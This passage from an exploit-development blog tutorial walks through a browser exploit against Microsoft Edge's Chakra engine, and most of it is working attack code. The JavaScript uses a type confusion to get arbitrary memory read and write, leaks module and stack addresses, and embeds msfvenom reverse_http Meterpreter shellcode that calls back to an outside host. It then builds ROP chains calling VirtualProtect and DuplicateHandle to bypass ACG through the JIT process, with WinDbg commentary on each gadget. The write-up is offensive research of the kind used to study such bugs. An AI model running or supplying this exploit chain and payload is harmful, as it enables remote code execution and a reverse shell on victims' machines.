    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST= LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);

	// Store where our ROP chain begins
	ropBegin = countMe;

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    0:020> u chakra+0xd4a73
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
			document.write("[+] Found our return address on the stack!");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));

            // Break the loop

        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;

	// alert() for debugging

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

Before I explain the reasoning behind the ROP chain, let me say just two things:

  1. Notice that we incremented countMe by 0x50 bytes after we wrote our shellcode. This is to ensure that our ROP chain and shellcode don’t collide and we have a noticeable gap between them, so we can differentiate where the shellcode stops and the ROP chain begins
  2. You can generate ROP gadgets for chakra.dll with the rp++ utility leveraged in the first blog post. Here is the command: rp-win-x64.exe -f C:\Windows\system32\chakra.dll -r 5 > C:\PATH\WHERE\YOU\WANT\TO\STORE\ROP\GADGETS\FILENAME.txt. Again, this is outlined in part two. From here you now will have a list of ROP gadgets from chakra.dll.

Now, let’s explain this ROP chain.

This ROP chain will not be executed anytime soon, nor will it be executed within the content process (where the exploit is being detonated). Instead, this ROP chain and our shellcode will be injected into the JIT process (where ACG is disabled). From there we will hijack execution of the JIT process and force it to execute our ROP chain. The ROP chain (when executed) will:

  1. Setup a call to VirtualProtect and mark our shellcode allocation as RWX
  2. Jump to our shellcode and execute it

Again, this is all done within the JIT process. Another remark on the ROP chain - we can notice a few interesting things, such as the lpAddress parameter. According to the documentation of VirtualProtect this parameter:

The address of the starting page of the region of pages whose access protection attributes are to be changed.

So, based on our exploitation plan, we know that this lpAddress parameter will be the address of our shellcode allocation, once it is injected into the JIT process. However, the dilemma is the fact that at this point in the exploit we have not injected any shellcode into the JIT process (at the time of our ROP chain and shellcode being stored in the content process). Therefore there is no way to fill this parameter with a correct value at the current moment, as we have yet to call VirtualAllocEx to actually inject the shellcode into the JIT process. Because of this, we setup our ROP chain as follows:


write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)

According to the __fastcall calling convention, the lpAddress parameter needs to be stored in the RCX register. However, we can see our ROP chain, as it currently stands, will only pop the value of 0 into RCX. We know, however, that we need the address of our shellcode to be placed here. Let me explain how we will reconcile this (we will step through all of this code when the time comes, but for now I just want to make this clear to the reader as to why our final ROP chain is only partially completed at the current moment).

  1. We will use VirtualAllocEx and WriteProcessMemory to allocate and write our shellcode into the JIT process with our first few ROP chains of our exploit.
  2. VirtualAllocEx will return the address of our shellcode within the JIT process
  3. When VirtualAllocEx returns the address of the remote allocation within the JIT process, we will use a call to WriteProcessMemory to write the actual address of our shellcode in the JIT process (which we now have because we injected it with VirtualAllocEx) into our final ROP chain (which currently is using a β€œblank placeholder” for lpAddress).

Lastly, we know that our final ROP chain (the one we are storing and updating with the aforesaid steps) not only marks our shellcode as RWX, but it is also responsible for returning into our shellcode. This can be seen in the below snippet of the VirtualProtect ROP chain.


write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

Again, we are currently using a blank β€œparameter placeholder” in this case, as our VirtualProtect ROP chain doesn’t know where our shellcode was injected into the JIT process (as it hasn’t happened at this point in the exploitation process). We will be updating this eventually. For now, let me summarize briefly what we are doing:

  1. Storing shellcode + VirtualProtect ROP chain with the .data section of chakra.dll (in the JIT process)
  2. These items will eventually be injected into the JIT process (where ACG is disabled).
  3. We will hijack control-flow execution in the JIT process to force it to execute our ROP chain. Our ROP chain will mark our shellcode as RWX and jump to it
  4. Lastly, our ROP chain is missing some information, as the shellcode hasn’t been injected. This information will be reconciled with our β€œlong” ROP chains that we are about to embark on in the next few sections of this blog post. So, for now, the β€œfinal” VirtualProtect ROP chain has some missing information, which we will reconcile on the fly.

Lastly, before moving on, let’s see how our shellcode and ROP chain look like after we execute our exploit (as it currently is).

After executing the script, we can then (before we close the dialogue) attach WinDbg to the content process and examine chakra_base + 0x74b000 to see if everything was written properly.

As we can see, we have successfully stored our shellcode and ROP chain (which will be executed in the future).

Let’s now start working on our exploit in order to achieve execution of our final ROP chain and shellcode.

DuplicateHandle ROP Chain

Before we begin, each ROP gadget I write has an associated comment. My blog will sometimes cut these off when I paste a code snippet, and you might be required to slide the bar under the code snippet to the right to see comments.

We have, as we have seen, already prepared what we are eventually going to execute within the JIT process. However, we still have to figure out how we are going to inject these into the JIT process, and begin code execution. This journey to this goal begins with our overwritten return address, causing control-flow hijacking, to start our ROP chain (just like in part two of this blog series). However, instead of directly executing a ROP chain to call WinExec, we will be chaining together multiple ROP chains in order to achieve this goal. Everything that happens in our exploit now happens in the content process (for the foreseeable future).

A caveat before we begin. Everything, from here on out, will begin at these lines of our exploit:

// alert() for debugging

// Corrupt the return address to control RIP with 0x4141414141414141
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

We will start writing our ROP chain where the Corrupt the return address to control RIP with 0x4141414141414141 comment is (just like in part two). Additionally, we are going to truncate (from here on out, until our final code) everything that comes before our alert() call. This is to save space in this blog post. This is synonymous from what we did in part two. So again, nothing that comes before the alert() statement will be changed. Let’s begin now.

As previously mentioned, it is possible to obtain a PROCESS_ALL_ACCESS handle to the JIT server by abusing the PROCESS_DUP_HANDLE handle stored in s_jitManager. Using our stack control, we know the next goal is to instrument a ROP chain. Although we will be leveraging multiple chained ROP chains, our process begins with a call to DuplicateHandle - in order to retrieve a privileged handle to the JIT server. This will allow us to compromise the JIT server, where ACG is disabled. This call to DuplicateHandle will be as follows:

	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS

With this in mind, here is how the function call will be setup via ROP:

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

Before stepping through our ROP chain, notice the first thing we do is read the JIT server handle:

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

After reading in and storing this value, we can begin our ROP chain. Let’s now step through the chain together in WinDbg. As we can see from our DuplicateHandle ROP chain, we are overwriting RIP (which we previously did with 0x4141414141414141 in our control-flow hijack proof-of-concept via return address overwrite) with a ROP gadget of pop rdx ; ret, which is located at chakra_base + 0x1d2c9. Let’s set a breakpoint here, and detonate our exploit. Again, as a point of contention - the __fastcall calling convention is in play - meaning arguments go in RCX, RDX, R8, R9, RSP + 0x20, etc.

After hitting the breakpoint, we can inspect RSP to confirm our ROP chain has been written to the stack.

Our first gadget, as we know, is a pop rdx ; ret gadget. After execution of this gadget, we have stored a pseudo-handle with PROCESS_ALL_ACCESS into RDX.

This brings our function call to DuplicateHandle to the following state:

	GetCurrentProcess(),	// Pseudo handle to the current process

Our next gadget is mov r8, rdx ; add rsp, 0x48 ; ret. This will copy the pseudo-handle currently in RDX into R8 also.

We should also note that this ROP gadget increments the stack by 0x48 bytes. This is why in the ROP sequence we have 0x4141414141414141 padding β€œopcodes”. This padding is here to ensure that when the ret happens in our ROP gadget, execution returns to the next ROP gadget we want to execute, and not 0x48 bytes down the stack to a location we don’t intend execution to go to:

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
